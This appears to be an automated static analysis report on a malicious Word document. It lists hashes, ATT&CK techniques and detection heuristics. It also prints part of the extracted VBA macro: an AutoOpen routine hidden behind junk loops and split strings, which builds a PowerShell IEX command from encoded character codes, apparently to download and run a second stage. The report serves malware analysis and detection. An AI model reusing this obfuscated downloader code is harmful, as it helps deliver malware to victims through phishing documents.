Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fd8c110fd0b7b3a8…

MALICIOUS

Office (OLE)

107.2 KB Created: 2018-06-21 12:06:00 Authoring application: Microsoft Office Word First seen: 2018-08-05
MD5: 944e2e68894e462dc0c96f67007cce4b SHA-1: 3523571755afb6e058667d4fc8ade9cac3aa2399 SHA-256: fd8c110fd0b7b3a8a50fa473ad9b3518b8c4e83875266da9b90ee25f749fb9a0
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call to execute a PowerShell command constructed from concatenated strings. The reconstructed command appears to be 'powershell IEX("120,115 , 97 ,59,121, 116 , 124 ,115 , 117,98,54 , 100 , 103 , 114, 121, 114, 111, 119, 46, 99, 111, 109, 47, 115, 116, 97, 114, 116, 117, 112, 46, 112, 115, 53")' which likely downloads and executes a second-stage payload. The presence of the AutoOpen macro and Shell() call strongly indicates malicious intent.

Heuristics 7

  • ClamAV: Doc.Malware.Valyria-6797998-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6797998-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17358 bytes
SHA-256: 80b754a96fbcd0b16e4bf61683e38bcbc7f44536858da66ac68c7cebe56c864d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "KEEibrmckjQiP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KlbsIzDzno"
Function KQwHrkTIVY()
On Error Resume Next
For Each sZtXMk In wVCRsq
wqJRw = (JMXzM * 90041 + 60024 * CInt(ADqYa - CDbl(63204)) * 52220 * Oct(89350))
YanviL = zBhcTD = FYjjj
uKRFZ = 95972 + Atn(34607) / 22880 / Round(87179) / 34626 / CInt(iDNlr)
Next
MtrpXlk = "OwerSHe" + "ll IEX(" + "[Str" + "ing]::jOin"
For Each baBsB In NCwwi
zrAvsj = (IiVkt * 36779 + 8006 * CInt(XtPqjO - CDbl(26510)) * 15981 * Oct(11652))
JswECb = jbtaJ = LiXjcF
HZzcpJ = 66889 + Atn(11250) / 98229 / Round(43234) / 72388 / CInt(uQiqOD)
Next
WoUni = "( '',((50 , 10" + "3, 124 ,121," + "67 ," + "68 ,120,5" + "4 , 43, " + "54, "
For Each ujJrKI In FDMLi
CQXkvW = (tsvkE * 15907 + 83521 * CInt(XdnIf - CDbl(92929)) * 21158 * Oct(11826))
hnTbDf = nrAjdt = usomBn
mBRwi = 50691 + Atn(47414) / 5884 / Round(99166) / 78960 / CInt(KZCICn)
Next
pnjfU = "120,115 , 97 ," + "59,121, 116 , 1" + "24 ,115 , 1" + "17,9" + "8,5" + "4 , 10"
For Each NCzNIL In iftQqJ
SYulC = (UEUksL * 77433 + 37473 * CInt(vmpBw - CDbl(77710)) * 72369 * Oct(54798))
tFMEv = mJfisA = XAKVI
MVwWSJ = 68554 + Atn(12659) / 51022 / Round(78751) / 24181 / CInt(jvVrw)
Next
wiROvT = "0 , 1" + "19, 1" + "20,114, 12" + "1 ,123, 45,5"
For Each QJpzi In FbTnPp
bfEPEz = (uuLYMU * 36613 + 26965 * CInt(EmfDt - CDbl(10010)) * 98238 * Oct(85597))
mRRqq = rkwlpc = QuNWVw
lOMrQ = 28095 + Atn(2541) / 68193 / Round(73801) / 93860 / CInt(jLASf)
Next
PRLwqGuaw = "0,99, 69," + " 79, 8" + "1, 82,54" + " , 43 , 54,12" + "0,11"
For Each DEPhb In hYiYV
pXjAci = (Eaabu * 14878 + 96922 * CInt(OIRjw - CDbl(27076)) * 92546 * Oct(37384))
iiJsi = hpfzw = mfjWu
rccVad = 39974 + Atn(36997) / 31957 / Round(34138) / 85809 / CInt(XtDSS)
Next
jiAFRPz = "5,97 , 59, " + "121," + "116,124,115," + " 117 , 98" + ", 5" + "4, 69,1" + "11,10" + "1,98, 11"
For Each UfaHtl In KBbcc
JDmErp = (IjXLB * 29793 + 94918 * CInt(ZDVUN - CDbl(78899)) * 3397 * Oct(28808))
jiqGP = srnjiT = pMcFln
OFioH = 70076 + Atn(97513) / 12655 / Round(14132) / 30165 / CInt(IolUIw)
Next
luJmFwbH = "5 , 123 ," + " 56,88 ,1" + "15, 98 , 5" + "6, 65, 115" + ", 116 , 8" + "5, " + "12" + "2 "
KQwHrkTIVY = MtrpXlk + WoUni + pnjfU + wiROvT + PRLwqGuaw + jiAFRPz + luJmFwbH
End Function
Function fYDPD()
On Error Resume Next
For Each sFiUN In OooOIr
DOHmi = (Bzfcm * 68993 + 46549 * CInt(aizUEd - CDbl(97003)) * 87439 * Oct(65449))
urwZSv = zPIpth = qEzHMc
kpooJp = 87767 + Atn(8594) / 26930 / Round(17630) / 18712 / CInt(drmGcj)
Next
oEXVswSAR = ",127" + ",115 ,120,98" + " , 45" + ", 50,6" + "7 ,123"
For Each roUQBj In Aizjqj
kKBJl = (GrtBw * 61567 + 26421 * CInt(HDwVb - CDbl(56166)) * 71180 * Oct(8182))
ZnHNo = EhSdb = hkwqXd
uSRVS = 85776 + Atn(86692) / 51005 / Round(3513) / 22807 / CInt(DUjuc)
Next
KLBpf = ",9" + "9 , 112" + ", " + "71, 5" + "4 ,"
For Each ivRbp In jCmKZ
BiDzk = (wISoU * 91947 + 78809 * CInt(VDZGM - CDbl(74823)) * 16271 * Oct(51083))
cLZFw = SjhTHA = LDjWzT
paVmm = 98140 + Atn(55348) / 55798 / Round(60880) / 95802 / CInt(KbSboK)
Next
Avzoh = "43," + " 5" + "4 , 49 , 126 , " + "98, 98 ,102," + "44 " + ", 57 ,57, 98,11"
For Each wXAIm In hCosWX
poXWBp = (TzIpAk * 62259 + 94634 * CInt(OkOZT - CDbl(98955)) * 92964 * Oct(5410))
ntFjKk = IHzVD = ZwXkwP
HCwkd = 49115 + Atn(14876) / 14456 / Round(95822) / 43751 / CInt(sUpOwh)
Next
PwzJQRvc = "0 , 12" + "4, 113," + " 119," + " 97, 116 ," + "123 , 5" + "6," + " 117,1"
For Each oXirci In VSKQBi
jrZlz = (GldzK * 71315 + 15220 * CInt(jGLCqA - CDbl(19085)) * 84548 * Oct(54705))
aNIIG = rwnoLc = dzMdD
jhrazl = 23432 + Atn(99160) / 27556 / Round(20948) / 66066 / CInt(pPJKjM)
Next
LUEhT = "21 ,123 , 57 " + ",68,122 , 1" + "14, 94 , " + "35 ,"
fYDPD = oEXVswSAR + KLBpf + Avzoh + PwzJQRvc + LUEhT
End Function
Function zVMCZXrS()
On Erro
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.